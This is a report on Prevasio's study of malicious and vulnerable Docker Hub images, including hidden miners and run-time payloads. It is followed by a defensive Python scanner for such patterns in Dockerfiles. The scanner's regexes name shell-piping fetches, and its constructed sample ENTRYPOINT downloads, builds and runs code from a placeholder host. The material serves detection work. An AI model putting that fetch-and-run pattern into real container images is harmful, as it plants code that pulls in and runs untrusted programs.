Researchers from Prevasio studied 4,000,000 publicly available Docker images hosted on Docker Hub and found that more than half of them have critical vulnerabilities, and several thousand images contain malicious or potentially dangerous elements.
For the analysis, the researchers used their own Prevasio Analyzer service, which had to run non-stop for a month on 800 machines.
The analysis found that 51% of the 4,000,000 examined images contain packages or dependencies with at least one critical vulnerability, and another 13% are vulnerable to high severity bugs.
Approximately 6400 images (0.16% of the total) were classified as malicious or potentially dangerous due to the presence of malware, cryptocurrency miners, hacking tools, the malicious npm package (flatmap-stream) and Trojans in their composition. Worse, it turned out that all of these images together had been downloaded over 300,000,000 times.
Cryptocurrency miners were found in 44% of the 6400 flagged containers. Although in many cases the developers honestly state that their images contain miners, sometimes the miners are hidden.
“Regardless of the original intent, if an employee of a company uses Docker Hub and then launches an image with a miner at work, there is a high probability that the company’s resources will not be used as originally intended. The system administrator may consider such container images undesirable for a corporate environment or even potentially dangerous,” the experts write.
Also, during the study, images with dynamic payloads were found: the original image itself contained nothing malicious, but at run time a dedicated script downloaded, compiled and executed the miner code.
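The dynamic-payload pattern described above (a clean image whose start-up instruction fetches, builds and runs code at container launch) leaves a trace in the image's build instructions, which is where a defender can look before an image is admitted to a registry or a cluster. The following is an added example, not Prevasio's analyzer or any tooling from the article: a heuristic scanner over a Dockerfile (or the `CreatedBy` strings of `docker history --no-trunc`) that flags instructions combining a network fetch with a compile or execute step, and weights `ENTRYPOINT`/`CMD` higher than build-time `RUN` lines, since the former run on every container start. The sample Dockerfile, hostnames and scoring weights are constructed for illustration.

```python
"""
Heuristic scanner for Dockerfile instructions that look like a "dynamic
payload": the image carries no malicious binary, but an instruction fetches
code over the network and then compiles and/or executes it.

Added example; not Prevasio's tooling. Input is assumed to be Dockerfile text
(continuation lines joined); the sample below is constructed.
"""
import re
from dataclasses import dataclass, field
from typing import List

# A fetch must actually reference a URL (installing the curl package is not a fetch).
FETCH = re.compile(r"\b(curl|wget)\b[^|&;]*https?://|\bgit\s+clone\b")
# Native or toolchain build steps.
COMPILE = re.compile(r"\b(gcc|cc|g\+\+|make|cmake|cargo\s+build|go\s+build)\b")
# Piping into a shell, marking executable, or launching a local binary.
EXEC = re.compile(r"(\|\s*(ba)?sh\b|\bchmod\s+\+x\b|\b(nohup|exec)\s|\./\S+)")
# Instructions that run at container start rather than at image build time.
RUNTIME_INSTRUCTIONS = ("ENTRYPOINT", "CMD")


@dataclass
class Finding:
    line_no: int           # first line of the (possibly continued) instruction
    instruction: str       # RUN, ENTRYPOINT, CMD, ...
    signals: List[str] = field(default_factory=list)
    runtime: bool = False  # True for ENTRYPOINT/CMD

    @property
    def score(self) -> int:
        # Constructed weights: fetch+execute in one command is the core pattern;
        # a compile step and run-time placement each raise confidence.
        s = 0
        if "fetch" in self.signals and "exec" in self.signals:
            s += 2
        if "compile" in self.signals:
            s += 1
        if self.runtime:
            s += 1
        return s


def _instructions(text: str):
    """Yield (line_no, INSTRUCTION, body), joining backslash-continued lines."""
    buf, start = [], None
    for i, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if start is None:
            start = i
        if line.endswith("\\"):
            buf.append(line[:-1].rstrip())
            continue
        buf.append(line)
        parts = " ".join(buf).split(None, 1)
        if len(parts) == 2:
            yield start, parts[0].upper(), parts[1]
        buf, start = [], None


def scan_dockerfile(text: str) -> List[Finding]:
    """Return findings for instructions that fetch from the network and also
    compile or execute, highest score first."""
    findings = []
    for line_no, instr, body in _instructions(text):
        signals = [name for name, rx in (("fetch", FETCH), ("compile", COMPILE), ("exec", EXEC))
                   if rx.search(body)]
        if "fetch" in signals and len(signals) >= 2:
            findings.append(Finding(line_no, instr, signals, instr in RUNTIME_INSTRUCTIONS))
    return sorted(findings, key=lambda f: (-f.score, f.line_no))


# Constructed sample: a build-time clone+make (common, low score) and an
# ENTRYPOINT that downloads, builds and backgrounds a binary at every start.
SAMPLE_DOCKERFILE = """\
# constructed sample, not a real image
FROM ubuntu:20.04
RUN apt-get update && apt-get install -y curl build-essential
RUN git clone https://example.invalid/lib.git /tmp/lib && cd /tmp/lib && make && make install
COPY start.sh /usr/local/bin/start.sh
CMD ["python3", "app.py"]
ENTRYPOINT curl -s http://example.invalid/src.tar.gz | tar xz && \\
    cd src && make && nohup ./app >/dev/null 2>&1 &
"""

if __name__ == "__main__":
    for f in scan_dockerfile(SAMPLE_DOCKERFILE):
        where = "runtime" if f.runtime else "build-time"
        print(f"line {f.line_no}: {f.instruction} ({where}) signals={f.signals} score={f.score}")
```

Run against the constructed sample, the `ENTRYPOINT` (line 7, fetch+compile+exec at run time) ranks first with score 4, while the build-time `git clone ... && make` on line 4 is reported with score 1; the `apt-get install curl` line and the plain `CMD` are not flagged. A scanner like this is only a triage aid: a review of what the image actually does at start-up, and a policy that rejects images whose entrypoint reaches out to the network to obtain code, is the real control.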